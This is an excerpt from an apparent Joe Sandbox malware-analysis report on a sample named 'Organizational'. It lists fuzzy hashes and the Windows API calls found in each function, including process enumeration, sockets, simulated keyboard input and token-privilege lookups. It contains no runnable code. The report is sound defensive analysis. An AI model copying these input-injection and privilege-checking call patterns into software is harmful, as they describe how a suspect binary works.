                                                          • Opcode ID: d5189f486b87cc78d86056cb55942dfd7f1433b35f8f5beedf99606f0e2d6c08
                                                          • Instruction ID: b156c148cd0b1880667b0875d4072756860d876837fe4f82e79ce1111df932a5
                                                          • Opcode Fuzzy Hash: d5189f486b87cc78d86056cb55942dfd7f1433b35f8f5beedf99606f0e2d6c08
                                                          • Instruction Fuzzy Hash: 09A12435224A019FD710EF54C481F2AB7E4BF88314F148A4DF9999B3A1CB70ED64CB96
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,002E3C4C,?), ref: 002A8308
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,002E3C4C,?), ref: 002A8320
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,002E0988,000000FF,?,00000000,00000800,00000000,?,002E3C4C,?), ref: 002A8345
                                                          • _memcmp.LIBCMT ref: 002A8366
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID:
                                                          • API String ID: 314563124-0
                                                          • Opcode ID: 62a9ad35d33e7b74cf75c803c66370f10d50f23f2e21870578a1047dc49540ed
                                                          • Instruction ID: 6b94fe26102d9a890fb227ea4d06f3a817a3fdacd14a44e21925d669df84791f
                                                          • Opcode Fuzzy Hash: 62a9ad35d33e7b74cf75c803c66370f10d50f23f2e21870578a1047dc49540ed
                                                          • Instruction Fuzzy Hash: 12812C71A10109EFCB04DFD4C888EEEB7B9FF89315F244598E505AB250DB71AE56CB60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: e876d1e5ed574567aeec6cfab7add39eab4cc3bc32f923d4113c99e32a1bd50c
                                                          • Instruction ID: f6163f8dcfaf698daa25a415e47ca0b639ab361579fb8d327bdf07a440d9d248
                                                          • Opcode Fuzzy Hash: e876d1e5ed574567aeec6cfab7add39eab4cc3bc32f923d4113c99e32a1bd50c
                                                          • Instruction Fuzzy Hash: 4351A830638B029BD7209F79DC95B2DF3E9AF46711B20882FE546C76D1DF7098608B19
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 002CF526
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 002CF534
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 002CF5F4
                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 002CF603
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                          • String ID:
                                                          • API String ID: 2576544623-0
                                                          • Opcode ID: f97c34994a9513de3feb4d386b92c62d08734d9b2cd6bc2241f8310401357001
                                                          • Instruction ID: 5e77715231ea4d19b8aaca6ce7140ed6e0e2bafc303659653fe1a1c4ea9062fd
                                                          • Opcode Fuzzy Hash: f97c34994a9513de3feb4d386b92c62d08734d9b2cd6bc2241f8310401357001
                                                          • Instruction Fuzzy Hash: D5518C711243119FD310EF20D886E6BB7E8EF94704F44492DF995D72A1EB70A968CF92
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                          • String ID:
                                                          • API String ID: 2782032738-0
                                                          • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                          • Instruction ID: 020fe9e5777dd0947a33bbee81c9b8fa85a8417a1306b0b90a87b32f845baa78
                                                          • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                          • Instruction Fuzzy Hash: 0A41E531620707DBDF28AE69C8A096F77A5AF85360B24C13DE95D87680D770DD608B44
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002AA68A
                                                          • __itow.LIBCMT ref: 002AA6BB
                                                            • Part of subcall function 002AA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002AA976
                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 002AA724
                                                          • __itow.LIBCMT ref: 002AA77B
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: 9866ef34da5431de55dac7014af9a0355b748e8dbf98a1e2356e807ec814edd2
                                                          • Instruction ID: 346cd8c195ff1dcfb1c74d6b50722fdd6c82894f9b385a9fe964111a9cfa8584
                                                          • Opcode Fuzzy Hash: 9866ef34da5431de55dac7014af9a0355b748e8dbf98a1e2356e807ec814edd2
                                                          • Instruction Fuzzy Hash: 82419074A10249ABDF11EF54CC46BEEBBB9EF45750F040059F905A3281DB70A9A4CFA2
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 002C70BC
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C70CC
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002C7130
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C713C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$__itow__swprintfsocket
                                                          • String ID:
                                                          • API String ID: 2214342067-0
                                                          • Opcode ID: 0439192cdf1fa753ca6072222351a7fecd0d2c305aaed1c08b9461dead126912
                                                          • Instruction ID: 0422f01d0fc97beb30e14d8ff1a1452356238b3d4ea307bcbc3bd67a5b532e64
                                                          • Opcode Fuzzy Hash: 0439192cdf1fa753ca6072222351a7fecd0d2c305aaed1c08b9461dead126912
                                                          • Instruction Fuzzy Hash: E8419F716602106FEB20BF24DC86F2AB7E4DB04B18F048558FE199B3C2DAB09D558F95
                                                          APIs
                                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,002E0980), ref: 002C6B92
                                                          • _strlen.LIBCMT ref: 002C6BC4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID:
                                                          • API String ID: 4218353326-0
                                                          • Opcode ID: 7564dc4df6fb6703d4689528b175aa6378512cbe7d170a87287fb1cf11f1a2a0
                                                          • Instruction ID: 4f8aaa74c9619bfa32be5a3e0cd0e2cf9a08d09d696d8b4ad8116caec7accba8
                                                          • Opcode Fuzzy Hash: 7564dc4df6fb6703d4689528b175aa6378512cbe7d170a87287fb1cf11f1a2a0
                                                          • Instruction Fuzzy Hash: 5D41C331620105ABCB04FB64DCD9FBEB3A9EF54314F148259F81A9B292DB30AE65CF54
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002D8F03
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: bc5a6476766afa8e778a025a85a36105c12fd3a9c9d247f10e592663304c7650
                                                          • Instruction ID: faabb672c16090a4a5b9504edbaf835658a18156caf1ee764a98388408d6cf3d
                                                          • Opcode Fuzzy Hash: bc5a6476766afa8e778a025a85a36105c12fd3a9c9d247f10e592663304c7650
                                                          • Instruction Fuzzy Hash: 7231B334674109AEEB219F18CC89BAC37A6EB09310FA44503FA51D67E0CFB0DD608A51
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 002DB1D2
                                                          • GetWindowRect.USER32(?,?), ref: 002DB248
                                                          • PtInRect.USER32(?,?,002DC6BC), ref: 002DB258
                                                          • MessageBeep.USER32(00000000), ref: 002DB2C9
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 75438fef9960698e6bd288c87015b8db8f45666d7606462d9fe53071f1c1cafa
                                                          • Instruction ID: fc8e1a673c1ec8dcc7b37c8572af5a82fe5dc00e03e75609d2a2d7a49386f749
                                                          • Opcode Fuzzy Hash: 75438fef9960698e6bd288c87015b8db8f45666d7606462d9fe53071f1c1cafa
                                                          • Instruction Fuzzy Hash: 71418B32A14105DFDF12CF98C8A9AAD7BF5FB49711F1A80AAE8189B350D330AC51CF90
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 002B1326
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 002B1342
                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 002B13A8
                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 002B13FA
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: cc38e578bbedd34f1995c603fc55f91fb16697c4c6c203c10eef2458da58a8f9
                                                          • Instruction ID: 03b3e812786dc351364c39fc1bc5b9ced7af2dc9b0adb39d874f2e3ecb7bd42c
                                                          • Opcode Fuzzy Hash: cc38e578bbedd34f1995c603fc55f91fb16697c4c6c203c10eef2458da58a8f9
                                                          • Instruction Fuzzy Hash: 6D319E30960209AEFF308E258C69BFEBBF5AB44390F84428AF491525D4E3B44DB19B51
                                                          APIs
                                                          • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 002B1465
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 002B1481
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 002B14E0
                                                          • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 002B1532
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: aca58bfe2f9822b0c9846965c69583b4e88b0e23b6a21ead6806d7c758e45da9
                                                          • Instruction ID: a2df3906db15594a0d0e7615a804a29b0ed7c7ce60aab20d9d932e7f03ad7b96
                                                          • Opcode Fuzzy Hash: aca58bfe2f9822b0c9846965c69583b4e88b0e23b6a21ead6806d7c758e45da9
                                                          • Instruction Fuzzy Hash: 24316C3096024A5EFF348F659C68BFBBBB5AB85350FD8431AE481521D1C3748DB29B61
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0028642B
                                                          • __isleadbyte_l.LIBCMT ref: 00286459
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00286487
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 002864BD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: bc4a26fda95445e3c064c91285520e761329bbd854886a9698f9e9d428d9448e
                                                          • Instruction ID: 6785a7d32e8d5161f99359e8e704891ae2515f6f382acea4b065848ec0cace37
                                                          • Opcode Fuzzy Hash: bc4a26fda95445e3c064c91285520e761329bbd854886a9698f9e9d428d9448e
                                                          • Instruction Fuzzy Hash: F531D235622256AFDB31AF75CC48BAE7BA5FF40320F154029E8249B1E0DB31E860DB50
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 002D553F
                                                            • Part of subcall function 002B3B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 002B3B4E
                                                            • Part of subcall function 002B3B34: GetCurrentThreadId.KERNEL32 ref: 002B3B55
                                                            • Part of subcall function 002B3B34: AttachThreadInput.USER32(00000000,?,002B55C0), ref: 002B3B5C
                                                          • GetCaretPos.USER32(?), ref: 002D5550
                                                          • ClientToScreen.USER32(00000000,?), ref: 002D558B
                                                          • GetForegroundWindow.USER32 ref: 002D5591
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: 7d42f738e16a86bdde389a6c9c38c92df5a4b3a70044c639640f3eb12fcefbb2
                                                          • Instruction ID: 671e499ef1b8a9c0f59ffdf91f807373d66872b77da6a430956ae9f148325243
                                                          • Opcode Fuzzy Hash: 7d42f738e16a86bdde389a6c9c38c92df5a4b3a70044c639640f3eb12fcefbb2
                                                          • Instruction Fuzzy Hash: 6D314B71910108AFDB00EFA5D885DEFF7F9EF98304F10406AE815E7201EA71AE558FA4
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • GetCursorPos.USER32(?), ref: 002DCB7A
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0028BCEC,?,?,?,?,?), ref: 002DCB8F
                                                          • GetCursorPos.USER32(?), ref: 002DCBDC
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0028BCEC,?,?,?), ref: 002DCC16
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 7d0837a3137cacebc136d13593f0ed31068cd25369980611d7f4b3fd934ea9c1
                                                          • Instruction ID: cc407d9528a5bbd8538873fab903f4fdd1539ab4949213623ffc51c8759e5215
                                                          • Opcode Fuzzy Hash: 7d0837a3137cacebc136d13593f0ed31068cd25369980611d7f4b3fd934ea9c1
                                                          • Instruction Fuzzy Hash: 3031C134610059AFCB158F58C899EFE7BB9FB09310F24409AF9059B3A1C7319D61EFA0
                                                          APIs
                                                          • __setmode.LIBCMT ref: 00270BE2
                                                            • Part of subcall function 0026402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7E51,?,?,00000000), ref: 00264041
                                                            • Part of subcall function 0026402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7E51,?,?,00000000,?,?), ref: 00264065
                                                          • _fprintf.LIBCMT ref: 00270C19
                                                          • OutputDebugStringW.KERNEL32(?), ref: 002A694C
                                                            • Part of subcall function 00274CCA: _flsall.LIBCMT ref: 00274CE3
                                                          • __setmode.LIBCMT ref: 00270C4E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                          • String ID:
                                                          • API String ID: 521402451-0
                                                          • Opcode ID: 6440f0c5575204d388577f87aa15b5522209074e10e87f726a55990d2d48a245
                                                          • Instruction ID: c2b4dcaf0e06364ff333a0d55589baa9aba385d91f420c10024bf9f0f603f23c
                                                          • Opcode Fuzzy Hash: 6440f0c5575204d388577f87aa15b5522209074e10e87f726a55990d2d48a245
                                                          • Instruction Fuzzy Hash: 91118731920105AAC709B7B4AC879BEBB6CDF01320F14810AF20857182DF311CB68BA1
                                                          APIs
                                                            • Part of subcall function 002A8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002A8D3F
                                                            • Part of subcall function 002A8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D49
                                                            • Part of subcall function 002A8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D58
                                                            • Part of subcall function 002A8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D5F
                                                            • Part of subcall function 002A8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002A8D75
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002A92C1
                                                          • _memcmp.LIBCMT ref: 002A92E4
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002A931A
                                                          • HeapFree.KERNEL32(00000000), ref: 002A9321
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: 56f090f2fe7efe5f1cd05812f37a48aa5d7c2bb7b127d412c9e167a1aa846534
                                                          • Instruction ID: 326e2fc5266eaec33f21314084d159876787a3642f00e0dd43043acb74210996
                                                          • Opcode Fuzzy Hash: 56f090f2fe7efe5f1cd05812f37a48aa5d7c2bb7b127d412c9e167a1aa846534
                                                          • Instruction Fuzzy Hash: 6C219071E50109EFDF10DFA5C989BEEB7B8EF45301F144099E844AB290DB70AA99CF90
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 002D63BD
